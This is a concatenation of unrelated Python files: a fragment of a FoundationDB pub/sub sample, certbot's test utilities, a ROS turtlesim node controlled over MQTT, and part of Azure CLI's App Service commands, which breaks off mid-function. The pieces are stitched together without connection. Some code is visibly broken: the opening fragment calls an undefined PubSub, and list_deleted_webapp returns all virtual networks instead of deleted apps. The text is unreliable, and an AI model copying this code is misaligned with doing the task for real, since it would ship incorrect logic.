import random
import threading
import time
import fdb
fdb.api_version(22)
db = fdb.open()
ps = PubSub(db)
ps.clear_all_messages()
sample_pubsub(3, 3, 3)
|
util.py
|
"""Test utilities.
.. warning:: This module is not part of the public API.
"""
import logging
import shutil
import sys
import tempfile
import unittest
from multiprocessing import Process, Event
import OpenSSL
import josepy as jose
import mock
import pkg_resources
import six
from six.moves import reload_module # pylint: disable=import-error
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
from certbot import configuration
from certbot import constants
from certbot import interfaces
from certbot import lock
from certbot import storage
from certbot import util
from certbot.compat import os
from certbot.compat import filesystem
from certbot.display import util as display_util
def vector_path(*names):
"""Path to a test vector."""
return pkg_resources.resource_filename(
__name__, os.path.join('testdata', *names))
def load_vector(*names):
"""Load contents of a test vector."""
# luckily, resource_string opens file in binary mode
data = pkg_resources.resource_string(
__name__, os.path.join('testdata', *names))
# Try at most to convert CRLF to LF when data is text
try:
return data.decode().replace('\r\n', '\n').encode()
except ValueError:
# Failed to process the file with standard encoding.
# Most likely not a text file, return its bytes untouched.
return data
def _guess_loader(filename, loader_pem, loader_der):
_, ext = os.path.splitext(filename)
if ext.lower() == '.pem':
return loader_pem
elif ext.lower() == '.der':
return loader_der
else: # pragma: no cover
raise ValueError("Loader could not be recognized based on extension")
def load_cert(*names):
"""Load certificate."""
loader = _guess_loader(
names[-1], OpenSSL.crypto.FILETYPE_PEM, OpenSSL.crypto.FILETYPE_ASN1)
return OpenSSL.crypto.load_certificate(loader, load_vector(*names))
def load_csr(*names):
"""Load certificate request."""
loader = _guess_loader(
names[-1], OpenSSL.crypto.FILETYPE_PEM, OpenSSL.crypto.FILETYPE_ASN1)
return OpenSSL.crypto.load_certificate_request(loader, load_vector(*names))
def load_comparable_csr(*names):
"""Load ComparableX509 certificate request."""
return jose.ComparableX509(load_csr(*names))
def load_rsa_private_key(*names):
"""Load RSA private key."""
loader = _guess_loader(names[-1], serialization.load_pem_private_key,
serialization.load_der_private_key)
return jose.ComparableRSAKey(loader(
load_vector(*names), password=None, backend=default_backend()))
def load_pyopenssl_private_key(*names):
"""Load pyOpenSSL private key."""
loader = _guess_loader(
names[-1], OpenSSL.crypto.FILETYPE_PEM, OpenSSL.crypto.FILETYPE_ASN1)
return OpenSSL.crypto.load_privatekey(loader, load_vector(*names))
def make_lineage(config_dir, testfile):
"""Creates a lineage defined by testfile.
This creates the archive, live, and renewal directories if
necessary and creates a simple lineage.
:param str config_dir: path to the configuration directory
:param str testfile: configuration file to base the lineage on
:returns: path to the renewal conf file for the created lineage
:rtype: str
"""
lineage_name = testfile[:-len('.conf')]
conf_dir = os.path.join(
config_dir, constants.RENEWAL_CONFIGS_DIR)
archive_dir = os.path.join(
config_dir, constants.ARCHIVE_DIR, lineage_name)
live_dir = os.path.join(
config_dir, constants.LIVE_DIR, lineage_name)
for directory in (archive_dir, conf_dir, live_dir,):
if not os.path.exists(directory):
filesystem.makedirs(directory)
sample_archive = vector_path('sample-archive')
for kind in os.listdir(sample_archive):
shutil.copyfile(os.path.join(sample_archive, kind),
os.path.join(archive_dir, kind))
for kind in storage.ALL_FOUR:
os.symlink(os.path.join(archive_dir, '{0}1.pem'.format(kind)),
os.path.join(live_dir, '{0}.pem'.format(kind)))
conf_path = os.path.join(config_dir, conf_dir, testfile)
with open(vector_path(testfile)) as src:
with open(conf_path, 'w') as dst:
dst.writelines(
line.replace('MAGICDIR', config_dir) for line in src)
return conf_path
def patch_get_utility(target='zope.component.getUtility'):
"""Patch zope.component.getUtility to use a special mock IDisplay.
The mock IDisplay works like a regular mock object, except it also
also asserts that methods are called with valid arguments.
:param str target: path to patch
:returns: mock zope.component.getUtility
:rtype: mock.MagicMock
"""
return mock.patch(target, new_callable=_create_get_utility_mock)
def patch_get_utility_with_stdout(target='zope.component.getUtility',
stdout=None):
"""Patch zope.component.getUtility to use a special mock IDisplay.
The mock IDisplay works like a regular mock object, except it also
also asserts that methods are called with valid arguments.
The `message` argument passed to the IDisplay methods is passed to
stdout's write method.
:param str target: path to patch
:param object stdout: object to write standard output to; it is
expected to have a `write` method
:returns: mock zope.component.getUtility
:rtype: mock.MagicMock
"""
stdout = stdout if stdout else six.StringIO()
freezable_mock = _create_get_utility_mock_with_stdout(stdout)
return mock.patch(target, new=freezable_mock)
class FreezableMock(object):
"""Mock object with the ability to freeze attributes.
This class works like a regular mock.MagicMock object, except
attributes and behavior set before the object is frozen cannot
be changed during tests.
If a func argument is provided to the constructor, this function
is called first when an instance of FreezableMock is called,
followed by the usual behavior defined by MagicMock. The return
value of func is ignored.
"""
def __init__(self, frozen=False, func=None, return_value=mock.sentinel.DEFAULT):
self._frozen_set = set() if frozen else {'freeze', }
self._func = func
self._mock = mock.MagicMock()
if return_value != mock.sentinel.DEFAULT:
self.return_value = return_value
self._frozen = frozen
def freeze(self):
"""Freeze object preventing further changes."""
self._frozen = True
def __call__(self, *args, **kwargs):
if self._func is not None:
self._func(*args, **kwargs)
return self._mock(*args, **kwargs)
def __getattribute__(self, name):
if name == '_frozen':
try:
return object.__getattribute__(self, name)
except AttributeError:
return False
elif name in ('return_value', 'side_effect',):
return getattr(object.__getattribute__(self, '_mock'), name)
elif name == '_frozen_set' or name in self._frozen_set:
return object.__getattribute__(self, name)
else:
return getattr(object.__getattribute__(self, '_mock'), name)
def __setattr__(self, name, value):
""" Before it is frozen, attributes are set on the FreezableMock
instance and added to the _frozen_set. Attributes in the _frozen_set
cannot be changed after the FreezableMock is frozen. In this case,
they are set on the underlying _mock.
In cases of return_value and side_effect, these attributes are always
passed through to the instance's _mock and added to the _frozen_set
before the object is frozen.
"""
if self._frozen:
if name in self._frozen_set:
raise AttributeError('Cannot change frozen attribute ' + name)
else:
return setattr(self._mock, name, value)
if name != '_frozen_set':
self._frozen_set.add(name)
if name in ('return_value', 'side_effect'):
return setattr(self._mock, name, value)
return object.__setattr__(self, name, value)
def _create_get_utility_mock():
display = FreezableMock()
# Use pylint code for disable to keep on single line under line length limit
for name in interfaces.IDisplay.names(): # pylint: disable=no-member,E1120
if name != 'notification':
frozen_mock = FreezableMock(frozen=True, func=_assert_valid_call)
setattr(display, name, frozen_mock)
display.freeze()
return FreezableMock(frozen=True, return_value=display)
def _create_get_utility_mock_with_stdout(stdout):
def _write_msg(message, *unused_args, **unused_kwargs):
"""Write to message to stdout.
"""
if message:
stdout.write(message)
def mock_method(*args, **kwargs):
"""
Mock function for IDisplay methods.
"""
_assert_valid_call(args, kwargs)
_write_msg(*args, **kwargs)
display = FreezableMock()
# Use pylint code for disable to keep on single line under line length limit
for name in interfaces.IDisplay.names(): # pylint: disable=no-member,E1120
if name == 'notification':
frozen_mock = FreezableMock(frozen=True,
func=_write_msg)
setattr(display, name, frozen_mock)
else:
frozen_mock = FreezableMock(frozen=True,
func=mock_method)
setattr(display, name, frozen_mock)
display.freeze()
return FreezableMock(frozen=True, return_value=display)
def _assert_valid_call(*args, **kwargs):
assert_args = [args[0] if args else kwargs['message']]
assert_kwargs = {}
assert_kwargs['default'] = kwargs.get('default', None)
assert_kwargs['cli_flag'] = kwargs.get('cli_flag', None)
assert_kwargs['force_interactive'] = kwargs.get('force_interactive', False)
display_util.assert_valid_call(*assert_args, **assert_kwargs)
class TempDirTestCase(unittest.TestCase):
"""Base test class which sets up and tears down a temporary directory"""
def setUp(self):
"""Execute before test"""
self.tempdir = tempfile.mkdtemp()
def tearDown(self):
"""Execute after test"""
# Cleanup opened resources after a test. This is usually done through atexit handlers in
# Certbot, but during tests, atexit will not run registered functions before tearDown is
# called and instead will run them right before the entire test process exits.
# It is a problem on Windows, that does not accept to clean resources before closing them.
logging.shutdown()
# Remove logging handlers that have been closed so they won't be
# accidentally used in future tests.
logging.getLogger().handlers = []
util._release_locks() # pylint: disable=protected-access
shutil.rmtree(self.tempdir)
class ConfigTestCase(TempDirTestCase):
"""Test class which sets up a NamespaceConfig object."""
def setUp(self):
super(ConfigTestCase, self).setUp()
self.config = configuration.NamespaceConfig(
mock.MagicMock(**constants.CLI_DEFAULTS)
)
self.config.verb = "certonly"
self.config.config_dir = os.path.join(self.tempdir, 'config')
self.config.work_dir = os.path.join(self.tempdir, 'work')
self.config.logs_dir = os.path.join(self.tempdir, 'logs')
self.config.cert_path = constants.CLI_DEFAULTS['auth_cert_path']
self.config.fullchain_path = constants.CLI_DEFAULTS['auth_chain_path']
self.config.chain_path = constants.CLI_DEFAULTS['auth_chain_path']
self.config.server = "https://example.com"
def _handle_lock(event_in, event_out, path):
"""
Acquire a file lock on given path, then wait to release it. This worker is coordinated
using events to signal when the lock should be acquired and released.
:param multiprocessing.Event event_in: event object to signal when to release the lock
:param multiprocessing.Event event_out: event object to signal when the lock is acquired
:param path: the path to lock
"""
if os.path.isdir(path):
my_lock = lock.lock_dir(path)
else:
my_lock = lock.LockFile(path)
try:
event_out.set()
assert event_in.wait(timeout=20), 'Timeout while waiting to release the lock.'
finally:
my_lock.release()
def lock_and_call(callback, path_to_lock):
"""
Grab a lock on path_to_lock from a foreign process then execute the callback.
:param callable callback: object to call after acquiring the lock
:param str path_to_lock: path to file or directory to lock
"""
# Reload certbot.util module to reset internal _LOCKS dictionary.
reload_module(util)
emit_event = Event()
receive_event = Event()
process = Process(target=_handle_lock, args=(emit_event, receive_event, path_to_lock))
process.start()
# Wait confirmation that lock is acquired
assert receive_event.wait(timeout=10), 'Timeout while waiting to acquire the lock.'
# Execute the callback
callback()
# Trigger unlock from foreign process
emit_event.set()
# Wait for process termination
process.join(timeout=10)
assert process.exitcode == 0
def skip_on_windows(reason):
"""Decorator to skip permanently a test on Windows. A reason is required."""
def wrapper(function):
"""Wrapped version"""
return unittest.skipIf(sys.platform == 'win32', reason)(function)
return wrapper
def temp_join(path):
"""
Return the given path joined to the tempdir path for the current platform
Eg.: 'cert' => /tmp/cert (Linux) or 'C:\\Users\\currentuser\\AppData\\Temp\\cert' (Windows)
"""
return os.path.join(tempfile.gettempdir(), path)
|
command_sender.py
|
# -*- coding: utf-8 -*-
import os
import re
import ssl
import threading
from math import pi
import rospy
from geometry_msgs.msg import Twist
import paho.mqtt.client as mqtt
from fiware_ros_turtlesim.params import getParams, findItem
from fiware_ros_turtlesim.logging import getLogger
logger = getLogger(__name__)
class CommandSender(object):
def __init__(self, node_name):
self.node_name = node_name
self.__client = mqtt.Client(protocol=mqtt.MQTTv311)
self.__client.on_connect = self._on_connect
self.__client.on_message = self._on_message
rospy.on_shutdown(self._do_stop)
rospy.on_shutdown(self.__client.disconnect)
rospy.on_shutdown(self.__client.loop_stop)
self._params = getParams(rospy.get_param("~"))
topic = findItem(self._params.ros.topics, 'key', 'turtlesim')
self.__ros_pub = rospy.Publisher(topic.name, Twist, queue_size=10)
self.__do_move = False
self.__lock = threading.Lock()
self._cmd_payload_re = re.compile(findItem(self._params.mqtt.topics, 'key', 'command_sender').re)
def connect(self):
logger.infof('Connect mqtt broker')
if hasattr(self._params.mqtt, 'cafile'):
cafile_path = self._params.mqtt.cafile.strip()
if len(cafile_path) > 0 and os.path.isfile(cafile_path):
self.__client.tls_set(cafile_path, tls_version=ssl.PROTOCOL_TLSv1_2)
if hasattr(self._params.mqtt, 'username') and hasattr(self._params.mqtt, 'password'):
username = self._params.mqtt.username.strip()
password = self._params.mqtt.password.strip()
if len(username) > 0 and len(password) > 0:
self.__client.username_pw_set(username, password)
self.__client.connect(self._params.mqtt.host, port=self._params.mqtt.port, keepalive=60)
self.__client.loop_start()
return self
def start(self):
logger.infof('CommandSender start : {}', self.node_name)
rospy.spin()
logger.infof('CommandSender stop : {}', self.node_name)
def nodetest(self):
from collections import namedtuple
logger.warnf('Test publish using publishtest of rostest')
r = rospy.Rate(0.5)
while not rospy.is_shutdown():
self._on_message(None, None, namedtuple('msg', ('payload',))(payload='device_id@move|circle'))
r.sleep()
def _on_connect(self, client, userdata, flags, response_code):
logger.infof('mqtt connect status={}', response_code)
client.subscribe(findItem(self._params.mqtt.topics, 'key', 'command_sender').name)
def _on_message(self, client, userdata, msg):
payload = str(msg.payload)
logger.infof('received message from mqtt: {}', payload)
matcher = self._cmd_payload_re.match(payload)
if matcher:
cmd = matcher.group('cmd')
device_id = matcher.group('device_id')
if cmd == 'circle':
self._do_circle()
elif cmd == 'square':
self._do_square()
elif cmd == 'triangle':
self._do_triangle()
elif cmd == 'cross':
self._do_stop()
elif cmd == 'up':
self._do_forward()
elif cmd == 'down':
self._do_backward()
elif cmd == 'left':
self._do_turnleft()
elif cmd == 'right':
self._do_turnright()
else:
logger.warnf('unknown cmd: {}', payload)
cmd = 'UNKNOWN CMD: {}'.format(cmd)
topic = findItem(self._params.mqtt.topics, 'key', 'command_sender_exec').name
fmt = findItem(self._params.mqtt.topics, 'key', 'command_sender_exec').format
self.__client.publish(topic, fmt.format(device_id=device_id, cmd=cmd))
else:
logger.warnf('unkown payload: {}', payload)
logger.debugf('active threds = {}', threading.active_count())
def _do_circle(self):
logger.infof('do circle')
def move(self):
self.__circle(int(2 * pi * self._params.ros.rate))
return self._do_move(move)
def _do_square(self):
logger.infof('do square')
def move(self):
self.__linear(2 * self._params.ros.rate)
self.__rotate(pi / 2)
self.__linear(2 * self._params.ros.rate)
self.__rotate(pi / 2)
self.__linear(2 * self._params.ros.rate)
self.__rotate(pi / 2)
self.__linear(2 * self._params.ros.rate)
self.__rotate(pi / 2)
return self._do_move(move)
def _do_triangle(self):
logger.infof('do triangle')
def move(self):
self.__linear(2 * self._params.ros.rate)
self.__rotate(pi * 2 / 3)
self.__linear(2 * self._params.ros.rate)
self.__rotate(pi * 2 / 3)
self.__linear(2 * self._params.ros.rate)
self.__rotate(pi * 2 / 3)
return self._do_move(move)
def _do_forward(self):
logger.infof('do forward')
def move(self):
self.__linear(int(self._params.ros.rate * 0.2))
return self._do_move(move)
def _do_backward(self):
logger.infof('do backward')
def move(self):
self.__linear(int(self._params.ros.rate * 0.2), reverse=True)
return self._do_move(move)
def _do_turnleft(self):
logger.infof('do turn left')
def move(self):
self.__rotate(pi / 16)
return self._do_move(move)
def _do_turnright(self):
logger.infof('do turn right')
def move(self):
self.__rotate(pi / 16, reverse=True)
return self._do_move(move)
def _do_stop(self):
with self.__lock:
self.__do_move = False
logger.infof('sotp moving')
def _do_move(self, callback):
def func():
if not callable(callback):
return
if self.__do_move:
logger.infof('now moving')
return
with self.__lock:
self.__do_move = True
callback(self)
with self.__lock:
self.__do_move = False
thread = threading.Thread(target=func)
thread.start()
return thread
def __circle(self, ticks):
move_cmd = Twist()
move_cmd.linear.x = 1.0
move_cmd.angular.z = 1.0
self.__move(ticks, move_cmd)
def __linear(self, ticks, reverse=False):
move_cmd = Twist()
move_cmd.linear.x = 1.0 if not reverse else -1.0
self.__move(ticks, move_cmd)
def __rotate(self, angle, reverse=False):
move_cmd = Twist()
move_cmd.angular.z = 1.0 if not reverse else -1.0
ticks = int(angle * self._params.ros.rate)
self.__move(ticks, move_cmd)
def __move(self, ticks, move_cmd):
r = rospy.Rate(self._params.ros.rate)
for t in range(ticks):
if not self.__do_move:
break
self.__ros_pub.publish(move_cmd)
r.sleep()
self.__ros_pub.publish(Twist())
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import threading
import time
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse # pylint: disable=import-error
from six.moves.urllib.request import urlopen # pylint: disable=import-error, ungrouped-imports
from binascii import hexlify
from os import urandom
import ast
import json
import ssl
import sys
import OpenSSL.crypto
from fabric import Connection
from knack.prompting import prompt_pass, NoTTYException
from knack.util import CLIError
from knack.log import get_logger
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.web.models import (Site, SiteConfig, User, AppServicePlan, SiteConfigResource,
SkuDescription, SslState, HostNameBinding, NameValuePair,
BackupRequest, DatabaseBackupSetting, BackupSchedule,
RestoreRequest, FrequencyUnit, Certificate, HostNameSslState,
RampUpRule, UnauthenticatedClientAction, ManagedServiceIdentity,
DeletedAppRestoreRequest, DefaultErrorResponseException,
SnapshotRestoreRequest, SnapshotRecoverySource)
from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient
from azure.mgmt.web.models import VnetInfo
from azure.mgmt.web.models import SwiftVirtualNetwork
from azure.mgmt.resource.resources.models import GenericResource
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands.client_factory import get_subscription_id
from azure.cli.command_modules.network._client_factory import network_client_factory
from azure.cli.command_modules.resource._client_factory import (
_resource_client_factory, _resource_policy_client_factory, _resource_lock_client_factory,
_resource_links_client_factory, _authorization_management_client, _resource_managedapps_client_factory)
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, open_page_in_browser, get_json_object
from .tunnel import TunnelServer
from azure.cli.core.profiles import ResourceType
from azure.cli.core.util import in_cloud_console
from azure.cli.core.util import open_page_in_browser
from .vsts_cd_provider import VstsContinuousDeliveryProvider
from ._params import AUTH_TYPES, MULTI_CONTAINER_TYPES, LINUX_RUNTIMES, WINDOWS_RUNTIMES
from ._client_factory import web_client_factory, ex_handler_factory
from ._appservice_utils import _generic_site_operation
from ._create_util import (zip_contents_from_dir, get_runtime_version_details, create_resource_group,
should_create_new_rg, set_location, should_create_new_asp, should_create_new_app,
get_lang_from_content)
from ._constants import (NODE_RUNTIME_NAME, OS_DEFAULT, STATIC_RUNTIME_NAME, PYTHON_RUNTIME_NAME)
from azure.cli.command_modules.relay._client_factory import namespaces_mgmt_client_factory, \
wcfrelays_mgmt_client_factory, hycos_mgmt_client_factory
from azure.mgmt.web.models import HybridConnection
from azure.mgmt.network.models import Subnet
from azure.mgmt.relay.models import AccessRights
logger = get_logger(__name__)
# pylint:disable=no-member,too-many-lines,too-many-locals
# region "Common routines shared with quick-start extensions."
# Please maintain compatibility in both interfaces and functionalities"
def create_webapp(cmd, resource_group_name, name, plan, runtime=None, startup_file=None, # pylint: disable=too-many-statements
deployment_container_image_name=None, deployment_source_url=None, deployment_source_branch='master',
deployment_local_git=None, multicontainer_config_type=None, multicontainer_config_file=None,
tags=None):
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
client = web_client_factory(cmd.cli_ctx)
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist".format(plan))
is_linux = plan_info.reserved
node_default_version = '8.11.1'
location = plan_info.location
site_config = SiteConfig(app_settings=[])
webapp_def = Site(location=location, site_config=site_config, server_farm_id=plan_info.id, tags=tags)
helper = _StackRuntimeHelper(client, linux=is_linux)
if is_linux:
if not validate_container_app_create_options(runtime, deployment_container_image_name,
multicontainer_config_type, multicontainer_config_file):
raise CLIError("usage error: --runtime | --deployment-container-image-name |"
" --multicontainer-config-type TYPE --multicontainer-config-file FILE")
if startup_file:
site_config.app_command_line = startup_file
if runtime:
site_config.linux_fx_version = runtime
match = helper.resolve(runtime)
if not match:
raise CLIError("Linux Runtime '{}' is not supported."
"Please invoke 'list-runtimes' to cross check".format(runtime))
elif deployment_container_image_name:
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
site_config.app_settings.append(NameValuePair(name="WEBSITES_ENABLE_APP_SERVICE_STORAGE",
value="false"))
elif multicontainer_config_type and multicontainer_config_file:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
site_config.linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
elif plan_info.is_xenon: # windows container webapp
site_config.windows_fx_version = _format_fx_version(deployment_container_image_name)
elif runtime: # windows webapp with runtime specified
if any([startup_file, deployment_container_image_name, multicontainer_config_file, multicontainer_config_type]):
raise CLIError("usage error: --startup-file or --deployment-container-image-name or "
"--multicontainer-config-type and --multicontainer-config-file is "
"only appliable on linux webapp")
match = helper.resolve(runtime)
if not match:
raise CLIError("Runtime '{}' is not supported. Please invoke 'list-runtimes' to cross check".format(runtime)) # pylint: disable=line-too-long
match['setter'](match, site_config)
# Be consistent with portal: any windows webapp should have this even it doesn't have node in the stack
if not match['displayName'].startswith('node'):
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
else: # windows webapp without runtime specified
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
if site_config.app_settings:
for setting in site_config.app_settings:
logger.info('Will set appsetting %s', setting)
poller = client.web_apps.create_or_update(resource_group_name, name, webapp_def)
webapp = LongRunningOperation(cmd.cli_ctx)(poller)
# Ensure SCC operations follow right after the 'create', no precedent appsetting update commands
_set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name)
return webapp
def validate_container_app_create_options(runtime=None, deployment_container_image_name=None,
multicontainer_config_type=None, multicontainer_config_file=None):
if bool(multicontainer_config_type) != bool(multicontainer_config_file):
return False
opts = [runtime, deployment_container_image_name, multicontainer_config_type]
return len([x for x in opts if x]) == 1 # you can only specify one out the combinations
def update_app_settings(cmd, resource_group_name, name, settings=None, slot=None, slot_settings=None):
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_application_settings', slot)
result, slot_result = {}, {}
# pylint: disable=too-many-nested-blocks
for src, dest in [(settings, result), (slot_settings, slot_result)]:
for s in src:
try:
temp = shell_safe_json_parse(s)
if isinstance(temp, list): # a bit messy, but we'd like accept the output of the "list" command
for t in temp:
if t.get('slotSetting', True):
slot_result[t['name']] = t['value']
else:
result[t['name']] = t['value']
else:
dest.update(temp)
except CLIError:
setting_name, value = s.split('=', 1)
dest[setting_name] = value
result.update(slot_result)
for setting_name, value in result.items():
app_settings.properties[setting_name] = value
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings.properties, slot, client)
app_settings_slot_cfg_names = []
if slot_result:
new_slot_setting_names = slot_result.keys()
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.app_setting_names = slot_cfg_names.app_setting_names or []
slot_cfg_names.app_setting_names += new_slot_setting_names
app_settings_slot_cfg_names = slot_cfg_names.app_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _build_app_settings_output(result.properties, app_settings_slot_cfg_names)
def add_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type, account_name,
share_name, access_key, mount_path=None, slot=None, slot_setting=False):
from azure.mgmt.web.models import AzureStorageInfoValue
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
if custom_id in azure_storage_accounts.properties:
raise CLIError("Site already configured with an Azure storage account with the id '{}'. "
"Use 'az webapp config storage-account update' to update an existing "
"Azure storage account configuration.".format(custom_id))
azure_storage_accounts.properties[custom_id] = AzureStorageInfoValue(type=storage_type, account_name=account_name,
share_name=share_name, access_key=access_key,
mount_path=mount_path)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def update_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type=None, account_name=None,
share_name=None, access_key=None, mount_path=None, slot=None, slot_setting=False):
from azure.mgmt.web.models import AzureStorageInfoValue
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
existing_account_config = azure_storage_accounts.properties.pop(custom_id, None)
if not existing_account_config:
raise CLIError("No Azure storage account configuration found with the id '{}'. "
"Use 'az webapp config storage-account add' to add a new "
"Azure storage account configuration.".format(custom_id))
new_account_config = AzureStorageInfoValue(
type=storage_type or existing_account_config.type,
account_name=account_name or existing_account_config.account_name,
share_name=share_name or existing_account_config.share_name,
access_key=access_key or existing_account_config.access_key,
mount_path=mount_path or existing_account_config.mount_path
)
azure_storage_accounts.properties[custom_id] = new_account_config
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def enable_zip_deploy(cmd, resource_group_name, name, src, timeout=None, slot=None):
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
zip_url = scm_url + '/api/zipdeploy?isAsync=true'
deployment_status_url = scm_url + '/api/deployments/latest'
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers = authorization
headers['content-type'] = 'application/octet-stream'
import requests
import os
# Read file content
with open(os.path.realpath(os.path.expanduser(src)), 'rb') as fs:
zip_content = fs.read()
requests.post(zip_url, data=zip_content, headers=headers)
# check the status of async deployment
response = _check_zip_deployment_status(deployment_status_url, authorization, timeout)
return response
def get_sku_name(tier): # pylint: disable=too-many-return-statements
tier = tier.upper()
if tier == 'F1' or tier == "FREE":
return 'FREE'
elif tier == 'D1' or tier == "SHARED":
return 'SHARED'
elif tier in ['B1', 'B2', 'B3', 'BASIC']:
return 'BASIC'
elif tier in ['S1', 'S2', 'S3']:
return 'STANDARD'
elif tier in ['P1', 'P2', 'P3']:
return 'PREMIUM'
elif tier in ['P1V2', 'P2V2', 'P3V2']:
return 'PREMIUMV2'
elif tier in ['PC2', 'PC3', 'PC4']:
return 'PremiumContainer'
elif tier in ['EP1', 'EP2', 'EP3']:
return 'ElasticPremium'
else:
raise CLIError("Invalid sku(pricing tier), please refer to command help for valid values")
def _generic_settings_operation(cli_ctx, resource_group_name, name, operation_name,
setting_properties, slot=None, client=None):
client = client or web_client_factory(cli_ctx)
operation = getattr(client.web_apps, operation_name if slot is None else operation_name + '_slot')
if slot is None:
return operation(resource_group_name, name, str, setting_properties)
return operation(resource_group_name, name, slot, str, setting_properties)
def show_webapp(cmd, resource_group_name, name, slot=None, app_instance=None):
webapp = app_instance
if not app_instance: # when the routine is invoked as a help method, not through commands
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(name))
_rename_server_farm_props(webapp)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot)
return webapp
# for generic updater
def get_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def set_webapp(cmd, resource_group_name, name, slot=None, skip_dns_registration=None,
skip_custom_domain_verification=None, force_dns_registration=None, ttl_in_seconds=None, **kwargs):
instance = kwargs['parameters']
client = web_client_factory(cmd.cli_ctx)
updater = client.web_apps.create_or_update_slot if slot else client.web_apps.create_or_update
kwargs = dict(resource_group_name=resource_group_name, name=name, site_envelope=instance,
skip_dns_registration=skip_dns_registration,
skip_custom_domain_verification=skip_custom_domain_verification,
force_dns_registration=force_dns_registration,
ttl_in_seconds=ttl_in_seconds)
if slot:
kwargs['slot'] = slot
return updater(**kwargs)
def update_webapp(instance, client_affinity_enabled=None, https_only=None):
if 'function' in instance.kind:
raise CLIError("please use 'az functionapp update' to update this function app")
if client_affinity_enabled is not None:
instance.client_affinity_enabled = client_affinity_enabled == 'true'
if https_only is not None:
instance.https_only = https_only == 'true'
return instance
def set_functionapp(cmd, resource_group_name, name, **kwargs):
instance = kwargs['parameters']
if 'function' not in instance.kind:
raise CLIError('Not a function app to update')
client = web_client_factory(cmd.cli_ctx)
return client.web_apps.create_or_update(resource_group_name, name, site_envelope=instance)
def list_webapp(cmd, resource_group_name=None):
result = _list_app(cmd.cli_ctx, resource_group_name)
return [r for r in result if 'function' not in r.kind]
def list_deleted_webapp(cmd, resource_group_name=None, name=None, slot=None):
client = network_client_factory(cmd.cli_ctx)
return client.virtual_networks.list_all()
def restore_deleted_webapp(cmd, deleted_id, resource_group_name, name, slot=None, restore_content_only=None):
request = DeletedAppRestoreRequest(deleted_site_id=deleted_id, recover_configuration=not restore_content_only)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restore_from_deleted_app', slot, request)
def list_function_app(cmd, resource_group_name=None):
result = _list_app(cmd.cli_ctx, resource_group_name)
return [r for r in result if 'function' in r.kind]
def _list_app(cli_ctx, resource_group_name=None):
client = web_client_factory(cli_ctx)
if resource_group_name:
result = list(client.web_apps.list_by_resource_group(resource_group_name))
else:
result = list(client.web_apps.list())
for webapp in result:
_rename_server_farm_props(webapp)
return result
def _list_deleted_app(cli_ctx, resource_group_name=None, name=None, slot=None):
